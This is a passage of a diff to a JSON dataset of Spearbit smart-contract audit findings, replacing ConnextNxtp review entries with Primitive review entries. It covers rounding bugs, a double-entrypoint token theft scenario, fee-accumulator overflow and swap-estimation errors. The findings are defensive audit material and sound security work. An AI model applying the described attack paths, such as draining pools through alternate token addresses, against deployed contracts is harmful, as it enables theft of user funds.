\"MEV asset/quote profit: %s \\t %s\", mev_asset_balance - initialBalance, mev_quote_balance - ,! initialBalance ); } 15 }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: High Risk" ] }, { - "title": "Relayers can frontrun each other's calls to BridgeFacet.execute", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Relayers can front run each other's calls to BridgeFacet.execute. Currently, there is no on-chain mechanism to track how many fees should be allocated to each relayer. All the transfer bump fees are funneled into one address s.relayerFeeVault.", + "title": "Missing signextend when dealing with non-full word signed integers", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The AssemblyLib is using non-full word signed integers operations. If the signed data in the stack have not been signextend the twos complement arithmetic will not work properly, most probably reverting. The solidity compiler does this cleanup but this cleanup is not guaranteed to be done while using the inline assem- bly.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Medium Risk" ] }, { - "title": "OptimismHubConnector.processMessageFromRoot emits MessageProcessed for already processed messages", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Calls to processMessageFromRoot with an already processed _data still emit MessageProcessed. This might cause issues for off-chain agents like relayers monitoring this event.", + "title": "Tokens With Multiple Addresses Can Be Stolen Due to Reliance on balanceOf", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "Some ERC20 tokens have multiple valid contract addresses that serve as entrypoints for manipulat- ing the same underlying storage (such as Synthetix tokens like SNX and sBTC and the TUSD stablecoin). Because the FVM holds all tokens for all pools in the same contract, assumes that a contract address is a unique identifier for a token, and relies on the return value of balanceOf for manipulated tokens to determine what transfers are needed during transaction settlement, multiple entrypoint tokens are not safe to be used in pools. For example, suppose there is a pool with non-zero liquidity where one token has a second valid address. An attacker can atomically create a second pool using the alternate address, allocate liquidity, and then immediately deallocate it. During execution of the _settlement function, getNetBalance will return a positive net balance for the double entrypoint token, crediting the attacker and transferring them the entire balance of the double entrypoint token. This attack only costs gas, as the allocation and deallocation of non-double entrypoint tokens will cancel out.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Medium Risk" ] }, { - "title": "Add max cap for domains", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Currently there isn't any cap on the maximum amount of domains which system can support. If the size of the domains and connectors grow, at some point due to out-of-gas errors in updateHashes function, both addDomain and removeDomain could DOS.", + "title": "Swap amounts are always estimated with priority fee", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "A pool can have a priority fee that is only applied when the pool controller (contract) performs a swap. However, when estimating a swap with getAmountOut the priority fee will always be applied as long as there is a controller and a priority fee. As the priority fee is usually less than the normal fee, the input amount will be underestimated for non-controllers and the input amount will be too low and the swap reverts.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Medium Risk" ] }, { - "title": "In certain scenarios calls to xcall... or addRouterLiquidity... can be DoSed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The owner or an admin can frontrun (or it can be by an accident) a call that: A router has made on a canonical domain of a canonical token to supply that token as liquidity OR A user has made to xcall... supplying a canonical token on its canonical domain. The frontrunning call would set the cap to a low number (calling updateLiquidityCap). This would cause the calls mentioned in the bullet list to fail due to the checks against IERC20(_local).balanceOf(address(this)).", + "title": "Rounding functions are wrong for negative integers", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The AssemblyLib.scaleFromWadUpSigned and AssemblyLib.scaleFromWadDownSigned both work on int256s and therefore also on negative integers. However, the rounding is wrong for these. Rounding down should mean rounding towards negative infinity, and rounding up should mean rounding towards positive infinity. The scaleFromWadDownSigned only performs a truncations, rounding negative integers towards zero. This function is used in checkInvariant to ensure the new invariant is not less than the new invariant in a swap: int256 liveInvariantWad = invariant.scaleFromWadDownSigned(pools[poolId].pair.decimalsQuote); int256 nextInvariantWad = nextInvariant.scaleFromWadDownSigned( pools[poolId].pair.decimalsQuote ); nextInvariantWad >= liveInvariantWad It can happen for quote tokens with fewer decimals, for example, 6 with USDC, that liveInvariantWad was rounded from a positive 0.9999e12 value to zero. And nextInvariantWad was rounded from a negative value of -0.9999e12 to zero. The check passes even though the invariant is violated by almost 2 quote token units.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Medium Risk" ] }, { - "title": "Missing a check against address(0) in ConnextPriceOracle's constructor", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "When ConnextPriceOracle is deployed an address _wrapped is passed to its constructor. The current codebase does not check whether the passed _wrapped can be an address(0) or not.", + "title": "LPs can lose fees if fee growth accumulator overflows their checkpoint", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "Fees (that are not reinvested in the pool) are currently tracked through an accumulator value pool.feeGrowthGlobalAsset and pool.feeGrowthGlobalQuote, computed as asset or quote per liquidity. Each user providing liquidity has a checkpoint of these values from their last sync (claim). When syncing new fees, the distance from the current value to the users checkpoint is computed and multiplied by their liquidity. The accumu- lator values are deliberately allowed to overflow as only the distance matters. However, if an LP does not sync its fees and the accumulator grows, overflows, and grows larger than their last checkpoint, the LP loses all fees. Example: User allocates at pool.feeGrowthGlobalAsset = 1000e36 pool.feeGrowthGlobalAsset grows and overflows to 0. differenceAsset is still accurate. pool.feeGrowthGlobalAsset grows more and is now at 1000e36 again. differenceAsset will be zero. If the user only claims their fees now, theyll earn 0 fees.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Medium Risk" ] }, { - "title": "_executeCalldata() can revert if insufficient gas is supplied", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function _executeCalldata() contains the statement gasleft() - 10_000. This statement can revert if the available gas is less than 10_000. Perhaps this is the expected behaviour. Note: From the Tangerine Whistle fork only a maximum 63/64 of the available gas is sent to contract being called. Therefore, 1/64th is left for the calling contract. function _executeCalldata(...) ... { ... (success, returnData) = ExcessivelySafeCall.excessivelySafeCall(_params.to, gasleft() - 10_000, ... ); ... ,! }", + "title": "Unnecessary left shift in encodePoolId", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The encodePoolId performs a left shift of 0. This is a noop.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Gas Optimization" ] }, { - "title": "Be aware of precompiles", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The external calls by _executeCalldata() could call a precompile. Different chains have creative precompile implementations, so this could in theory pose problems. For example precompile 4 copies memory: what-s-the-identity-0x4-precompile Note: precompiles link to dedicated pieces of code written in Rust or Go that can be called from the EVM. Here are a few links for documentation on different chains: moonbeam precompiles, astar precompiles function _executeCalldata(...) ... { ... (success, returnData) = ExcessivelySafeCall.excessivelySafeCall( _params.to, ...); } else { returnData = IXReceiver(_params.to).xReceive(...); } ... }", + "title": "_syncPool performs unnecessary pool state updates", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The _syncPool function is only called during a swap. During a swap the liquidity never changes and the pools last timestamp has already been updated in _beforeSwapEffects.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Gas Optimization" ] }, { - "title": "Upgrade to solidity 0.8.17", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Solidity 0.8.17 released a bugfix where the optimizer could incorrectly remove storage writes if the code fit a certain pattern (see this security alert). This bug was introduced in 0.8.13. Since Connext is using the legacy code generation pipeline, i.e., compiling without the via-IR flag, the current code is not at risk. This is because assembly blocks dont write to storage. However, if this changes and Connext compiles through via-IR code generation, the code is more likely to be affected. One reason to use this code generation pipeline could be to enable gas optimizations not available in legacy code generation.", + "title": "Portfolio.sol gas optimizations", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "Throughout the contract weve identified a number of minor gas optimizations that can be performed. Weve gathered them into one issue to keep the issue number as small as possible. L750 The msg.value > 0 check is done also in the __wrapEther__ call L262 The following substitutions can be optimized in case assets are 0 by moving each instruction within the ifs on lines 256-266 pos.tokensOwedAsset -= claimedAssets.safeCastTo128(); pos.tokensOwedQuote -= claimedQuotes.safeCastTo128(); L376 Consider using the pool object (if it remains as a storage object) instead of pools[args.poolId] L444:L445 The following two instructions can be grouped into one. output = args.output; output = output.scaleToWad(... L436:L443 The internalBalance variable can be discarded due to the fact that it is used only within the input assignment. uint256 internalBalance = getBalance( msg.sender, _state.sell ? pool.pair.tokenAsset : pool.pair.tokenQuote ); input = args.useMax == 1 ? internalBalance : args.input; input = input.scaleToWad( _state.sell ? pool.pair.decimalsAsset : pool.pair.decimalsQuote ); L808 Assuming that the swap instruction will be one of the most used instructions, might be worth moving it as first if condition to save gas. L409 The if (args.input == 0) revert ZeroInput(); can be removed as it will result in iteration.input being zero and reverting on L457.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Gas Optimization" ] }, { - "title": "Add domain check in setupAssetWithDeployedRepresentation()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function setupAssetWithDeployedRepresentation() links a new _representation asset. However this should not be done on the canonical domain. So good to check this to prevent potential mistakes. function setupAssetWithDeployedRepresentation(...) ... { bytes32 key = _enrollAdoptedAndLocalAssets(_adoptedAssetId, _representation, _stableSwapPool, _canonical); ... ,! }", + "title": "Incomplete NatSpec comments", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "Throughout the IPortofolio.sol interface, various NatSpec comments are missing or incomplete", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Informational" ] }, { - "title": "If an adopted token and its canonical live on the same domain the cap for the custodied amount is applied for each of those tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "If _local is an adopted asset that lives on its canonical's original chain, then we are comparing the to-be-updated balance of this contract (custodied) with s.caps[key]. That means we are also comparing the balance of an adopted asset with the property above with the cap. For example, if A is the canonical token and B the adopted, then cap = s.caps[key] is used to cap the custodied amount in this contract for both of those tokens. So if the cap is 1000, the contract can have a balance of 1000 A and 1000 B, which is twice the amount meant to be capped. This is true basically for any approved asset with the above properties. When the owner or the admin calls setu- pAsset: // File: https://github.com/connext/nxtp/blob/32a0370edc917cc45c231565591740ff274b5c05/packages/deploym ents/contracts/contracts/core/connext/facets/TokenFacet.sol#L164-L172 ,! function setupAsset( c TokenId calldata _canonical, uint8 _canonicalDecimals, string memory _representationName, string memory _representationSymbol, address _adoptedAssetId, address _stableSwapPool, uint256 _cap ) external onlyOwnerOrAdmin returns (address _local) { such that _canonical.domain == s.domain and _adoptedAssetId != 0, then this asset has the property in ques- tion.", + "title": "Inaccurate Comments", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "These comments are inaccurate. [1] The hex value on this line translates to v0.1.0-beta instead of v1.0.0-beta. [2] computeTau returns either the time until pool maturity, or zero if the pool is already expired. [3] These comments do not properly account for the two byte offset from the start of the array (in L94, only in the endpoint of the slice).", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Informational" ] }, { - "title": "There are no checks/constraints against the _representation provided to setupAssetWithDe- ployedRepresentation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "setupAssetWithDeployedRepresentation is similar to setupAsset in terms of functionality, except it does not deploy a representation token if necessary. It actually uses the _representation address given as the representation token. The _representation parameter given does not have any checks in terms of functionality compared to when setupAsset which deploys a new BridgeToken instance: // File: packages\\deployments\\contracts\\contracts\\core\\connext\\facets\\TokenFacet.sol#L399 _token = address(new BridgeToken(_decimals, _name, _symbol)); Basically, representation needs to implement IBridgeToken (mint, burn, setDetails, ... ) and some sort of IERC20. Otherwise, if a function from IBridgeToken is not implemented or if it does not have IERC20 functionality, it can cause failure/reverts in some functions in this codebase. Another thing that is important is that the decimals for _representation should be equal to the decimals precision of the canonical token. And that _representation should not be able to update/change its decimals. Also, this opens an opportunity for a bad owner or admin to provide a malicious _representation to this function. This does not have to be a malicious act, it can also happen by mistake from for example an admin. Additionally the Connext Diamond must have the \"right\" to mint() and burn() the tokens.", + "title": "Check for priorityFee should have its own custom error", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The check for invalid priorityFee within the checkParameters function uses the same custom error as the one for fee. This could lead to confusion in the error output.", "labels": [ - "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Spearbit", + "Primitive", + "Severity: Informational" ] }, { - "title": "In dequeueVerified when no verified items are found in the queue last == first - 1", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The comment in dequeueVerified mentions that when no verified items are found in the queue, then last == first. But this is not true since the loop condition is last >= first and the loop only terminates (not considering the break) when last == first - 1. It is important to correct this incorrect statement in the comment, since a dev/user can by mistake take this state- ment as true and modify/use the code with this incorrect assumption in mind.", + "title": "Unclear @dev comment", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "This comment is misleading. It implies that cache is used to \"check\" state while it in fact changes it.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Informational" ] }, { - "title": "Dirty bytes in _loc and _len can override other values when packing a typed memory view in unsafeBuildUnchecked", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "For a TypeedMemView, the location and the length are supposed to occupy 12 bytes (uint96), but the type used for these values for the input parameters for unsafeBuildUnchecked is uint256. This would allow those values to carry dirty bytes and when the following calculations are performed: newView := shl(96, or(newView, _type)) // insert type newView := shl(96, or(newView, _loc)) // insert loc newView := shl(24, or(newView, _len)) // empty bottom 3 bytes _loc can potentially manipulate the type section of the view and _len can potentially manipulate both the _loc and the _type section.", + "title": "Unused custom error", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "Unused error error AlreadySettled();", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Informational" ] }, { - "title": "To use sha2, hash160 and hash256 of TypedMemView the hard-coded precompile addresses would need to be checked to make sure they return the corresponding hash values.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "sha2, hash160 and hash256 assume that the precompile contracts at address(2) and address(3) calculate and return the sha256 and ripemd160 hashes of the provided memory chunks. These assumptions depend on the chain that the project is going to be deployed on.", + "title": "Use named constants", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The decodeSwap function compares a value against the constant 6. This value indicates the SWAP_- ASSET constant. sellAsset := eq(6, and(0x0F, byte(0, value)))", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Informational" ] }, { - "title": "sha2, hash160 and hash256 of TypedMemView.sha2 do not clear the memory after calculating the hash", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "When a call to the precompile contract at address(2) (or at address(3)) is made, the returned value is placed at the slot pointed by the free memory pointer and then placed on the stack. The free memory pointer is not incremented to account for this used memory position nor the code tries to clean this memory slot of 32 bytes. Therefore after a call to sha2, hash160 or hash256, we would end up with dirty bytes.", + "title": "scaleFromWadUp and scaleFromWadUpSigned can underflow", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The scaleFromWadUp and scaleFromWadUpSigned will underflow if the amountWad parameter is 0 because they perform an unchecked subtraction on it: outputDec := add(div(sub(amountWad, 1), factor), 1) // ((a-1) / b) + 1", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Informational" ] }, { - "title": "Fee on transfer token support", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "It seems that only the addLiquidity function is currently supporting the fee on transfer token. All operations like swapping are prohibiting the fee on transfer token. Note: The SwapUtilsExternal.sol contract allow fee on transfer token and as per product team, this is expected from this token", + "title": "AssemblyLib.pack does not clear lowers upper bits", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The pack function packs the 4 lower bits of two bytes into a single byte. If the lower parameter has dirty upper bits, they will be mixed with the higher byte and be set on the final return value.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Informational" ] }, { - "title": "Fee on transfer tokens can stuck the transaction", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Consider the following scenario. 1. Assume User has made a xcall with amount A of token X with calldata C1. Since their was no fee while transferring funds, transfer was a success. 2. Now, before this amount can be transferred on the destination domain,token X introduced a fee on transfer. 3. Relayer now executes this transaction on destination domain via _handleExecuteTransaction function on BridgeFacet.sol#L756. 4. This transfers the amount A of token X to destination domain but since now the fee on this token has been introduced, destination domain receives amount A-delta. 5. This calldata is called on destination domain but the amount passed is A instead of A-delta so if the IXRe- ceiver has amount check then it will fail because it will now expect A amount when it really got A-delta amount.", + "title": "AssemblyLib.toBytes8/16 functions assumes a max raw length of 16", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The toBytes16 function only works if the length of the bytes raw parameter is at most 16 because of the unchcked subtraction: let shift := mul(sub(16, mload(raw)), 8) The same issue exists for the toBytes8 function.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Informational" ] }, { - "title": "Initial Liquidity Provider can trick the system", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Since there is no cap on the amount which initial depositor can deposit, an attacker can trick the system in bypassing admin fees for other users by selling liquidity at half admin fees. Consider the following scenario. 1. User A provides the first liquidity of a huge amount. 2. Since there aren't any fees from initial liquidity, admin fees are not collected from User A. 3. Now User A can sell his liquidity to other users with half admin fees. 4. Other users can mint larger liquidity due to lesser fees and User A also get benefit of adminFees/2.", + "title": "PortfolioLib.maturity returns wrong value for perpertual pools", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "A pool can be a perpetual pool that is modeled as a pool with a time to maturity always set to 1 year in the computeTau. However, the maturity function does not return this same maturity. This currently isnt a problem as maturity is only called from computeTau in case it is not a perpetual pool.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Informational" ] }, { - "title": "Ensure non-zero local asset in _xcall()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Local asset fetched in _xcall() is not verified to be a non-zero address. In case, if token mappings are not updated correctly and to future-proof from later changes, it's better to revert if a zero address local asset is fetched. local = _getLocalAsset(key, canonical.id, canonical.domain);", + "title": "_createPool has incomplete NatSpec and event args", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The _createPool function contains incomplete NatSpec specifications. Furthermore, the event emitted by this function can be improved by adding more arguments.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Informational" ] }, { - "title": "Use ExcessivelySafeCall to call xReceive()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "xReceive(). This is done to avoid copying large amount of return data in memory. This same attack vector exists for non-reconciled transfers, however in this case a usual function call is made for xReceive(). For However, in case non-reconciled calls fail due to this error, they can always be retried after reconciliation.", + "title": "_liquidityPolicy is cast to a uint8 but it should be a uint16", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "During _createPool the pool curve parameters are set. One of them is the jit parameter which is a uint16. It can be assigned the default value of _liquidityPolicy but it is cast to a uint8. If the _liquidityPolicy constant is ever changed to a value greater than type(uint8).max a wrong jit value will be assigned.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Informational" ] }, { - "title": "A router's liquidity might get trapped if the router is removed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "If the owner or a user with Role.Router Role removes a router that does not implement calling re- moveRouterLiquidity or removeRouterLiquidityFor, then any liquidity remaining in the contract for the removed router cannot be transferred back to the router.", + "title": "Update _feeSavingEffects documentation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The _feeSavingEffects documentation states: @return bool True if the fees were saved in positions owed tokens instead of re-invested.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Informational" ] }, { - "title": "In-flight transfers by the relayer can be reverted when setMaxRoutersPerTransfer is called before- hand by a lower number", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "For in-flight transfers where an approved sequencer has picked and signed an x number of routers for a transfer, from the time a relayer or another 3rd party grabs this ExecuteArgs _args to the time this party submits it to the destination domain by calling execute on a connext instance, the owner or an admin can call setMaxRoutersPerTransfer with a number lower than x on purpose or not. And this would cause the call to execute to revert with BridgeFacet__execute_maxRoutersExceeded.", + "title": "Document checkInvariant and resolve confusing naming", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The checkInvariant functions return values are undocumented and the used variables names are confusing.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Informational" ] }, { - "title": "All the privileged users that can call withdrawSwapAdminFees would need to trust each other", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The owner needs to trust all the admins and also all admins need to trust each other. Since any admin can call withdrawSwapAdminFees endpoint to withdraw all the pool's admin fees into their account.", + "title": "Token amounts are in wrong decimals if useMax parameter is used", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The allocate and swap functions have a useMax parameter that sets the token amounts to be used to the net balance of the contract. This net balance is the return value of a getNetBalance call, which is in token decimals. The code that follows (getPoolMaxLiquidity for allocate, iteration.input for swap) expects these amounts to be in WAD units. Using this parameter with tokens that don't have 18 decimals does not work correctly. The actual tokens used will be far lower than the expected amount to be used which will lead to user loss as the tokens remain in the contract after the action.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: High Risk" ] }, { - "title": "The supplied _a to initializeSwap cannot be directly updated but only ramped", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Once a swap is initialized by the owner or an admin (indexed by the key parameter) the supplied _a (the scaled amplification coefficient, Ann(cid:0)1 ) to initializeSwap cannot be directly updated but only ramped. The owner or the admin can still call rampA to update _a, but it will take some time for it to reach the desired value. This is mostly important if by mistake an incorrect value for _a is provided to initializeSwap.", + "title": "getAmountOut underestimates outputs leading to losses", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "When computing the output, the getAmountOut performs a bisection. However, this bisection returns any root of the function, not the lowest root. As the invariant is far from being strictly monotonic in R_x, it contains many neighbouring roots (> 2e9 in the example) and it's important to return the lowest root, corresponding to the lowest nextDependent, i.e., it leads to a larger output amount amountOut = prevDependent - nextDependent. Users using this function to estimate their outputs can incur significant losses. Example: Calling getAmountOut(poolId, false, 1, 0, address(0)) with the pool configuration in the example will return amtOut = 123695775, whereas the real max possible amtOut for that swap is 33x higher at 4089008108. The core issue is that invariant is not strictly monotonic, invariant(R_x, R_y) = invariant(R_x + 2_852_- 050_358, R_y), there are many neighbouring roots for the pool configuration: function test_eval() public { uint128 R_y = 56075575; uint128 R_x = 477959654248878758; uint128 stk = 117322822; uint128 vol = 406600000000000000; uint128 tau = 2332800; int256 prev = Invariant.invariant({R_y: R_y, R_x: R_x, stk: stk, vol: vol, tau: tau}); // this is the actual dependent that still satisfies the invariant R_x -= 2_852_050_358; int256 post = Invariant.invariant({R_y: R_y, R_x: R_x, stk: stk, vol: vol, tau: tau}); 25 console2.log(\"prev: %s\", prev); console2.log(\"post: %s\", post); assertEq(post, prev); assertEq(post, 0); }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Medium Risk" ] }, { - "title": "Inconsistent behavior when xcall with a non-existent _params.to", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "A xcall with a non-existent _params.to behaves differently depending on the path taken. 1. Fast Liquidity Path - Use IXReceiver(_params.to).xReceive. The _executeCalldata function will revert if _params.to is non-existent. Which technically means that the execution has failed. 2. Slow Path - Use ExcessivelySafeCall.excessivelySafeCall. This function uses the low-level call, which will not revert and will return true if the _params.to is non-existent. The _executeCalldata function will return with success set to True, which means the execution has succeeded.", + "title": "getAmountOut Calculates an Output Value That Sets the Invariant to Zero, Instead of Preserving Its Value", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The swap function enforces that the pool's invariant value does not decrease; however, the getA- mountOut function computes an expected swap output based on setting the pool's invariant to zero, which is only equivalent if the initial value of the invariant was already zero--which will generally not be the case as fees accrue and time passes. This is because in computeSwapStep (invoked by getAmountOut [1]), the func- tion (optimizeDependentReserve) passed [2] to the bisection algorithm for root finding returns just the invariant evaluated on the current arguments [3] instead of the difference between the evaluated and original invariant. As a consequence, getAmountOut will return an inaccurate result when the starting value of the invariant is non-zero, leading to either disadvantageous swaps or swaps that revert, depending on whether the current pool invariant value is less than or greater than zero.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Medium Risk" ] }, { - "title": "The lpToken cloned in initializeSwap cannot be updated", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Once a swap is initialized by the owner or an admin (indexed by the key parameter) an LPToken lpToken is created by cloning the provided lpTokenTargetAddress to the initializeSwap endpoint. There is no restriction on lpTokenTargetAddress except that it would need to be of LPToken like, but it can be malicious under the hood or have some security vulnerabilities, so it can not be trusted.", + "title": "getAmountOut Does Not Adjust The Pool's Reserve Values Based on the liquidityDelta Parameter", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", + "body": "The liquidityDelta parameter allows a caller to adjust the liquidity in a pool before simulating a swap. However, corresponding adjustments are not made to the per-pool reserves, virtualX and virtualY. This makes the reserve-to-liquidity ratios used in the calculations incorrect, leading to inaccurate results (or potentially reverts if the invalid values fall outside of allowed ranges). Use of the inaccurate swap outputs could lead either to swaps at bad prices or swaps that revert unexpectedly.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Low Risk" + "Primitive", + "Severity: Medium Risk" ] }, { - "title": "Lack of zero check", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Consider the following scenarions. Instance 1 - BridgeFacet.addSequencer The addSequencer function of BridgeFacet.sol does not check that the sequencer address is not zero before adding them. function addSequencer(address _sequencer) external onlyOwnerOrAdmin { if (s.approvedSequencers[_sequencer]) revert BridgeFacet__addSequencer_alreadyApproved(); s.approvedSequencers[_sequencer] = true; emit SequencerAdded(_sequencer, msg.sender); } If there is a mistake during initialization or upgrade, and set s.approvedSequencers[0] = true, anyone might be able to craft a payload to execute on the bridge because the attacker can bypass the following validation within the execute function. if (!s.approvedSequencers[_args.sequencer]) { revert BridgeFacet__execute_notSupportedSequencer(); } Instance 2 - BridgeFacet.enrollRemoteRouter 43 The enrollRemoteRouter function of BridgeFacet.sol does not check that the domain or router address is not zero before adding them. function enrollRemoteRouter(uint32 _domain, bytes32 _router) external onlyOwnerOrAdmin { // Make sure we aren't setting the current domain as the connextion. if (_domain == s.domain) { revert 